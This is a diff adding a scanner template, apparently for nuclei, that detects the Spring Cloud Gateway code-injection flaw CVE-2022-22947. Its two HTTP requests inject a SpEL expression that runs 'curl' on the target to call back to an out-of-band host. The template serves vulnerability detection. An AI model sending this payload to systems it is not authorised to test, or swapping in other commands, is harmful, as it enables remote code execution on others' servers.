diff --git a/cves/2022/CVE-2022-22947.yaml b/cves/2022/CVE-2022-22947.yaml new file mode 100644 index 0000000000..7fa9eb1489 --- /dev/null +++ b/cves/2022/CVE-2022-22947.yaml @@ -0,0 +1,67 @@ +id: CVE-2022-22947 + +info: + name: Spring Cloud Gateway Code Injection + author: pdteam + severity: critical + description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + reference: + - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + - https://github.com/wdahlenburg/spring-gateway-demo + - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + - https://tanzu.vmware.com/security/cve-2022-22947 + tags: cve,cve2022,apache,spring,vmware,actuator + +requests: + - raw: + - | + POST /actuator/gateway/routes/new_route HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "predicates": [ + { + "name": "Path", + "args": { + "_genkey_0": "/new_route/**" + } + } + ], + "filters": [ + { + "name": "RewritePath", + "args": { + "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\")}", + "_genkey_1": "/${path}" + } + } + ], + "uri": "https://wya.pl", + "order": 0 + } + - | + POST /actuator/gateway/refresh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "predicate": "Paths: [/new_route], match trailing slash: true", + "route_id": "new_route", + "filters": [ + "[[RewritePath #{T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\")} = /${path}], order = 1]" + ], + "uri": "https://wya.pl", + "order": 0 + } + + matchers-condition: and + matchers: + - type: status + status: + - 201 + + - type: word + part: interactsh_protocol + words: + - "http"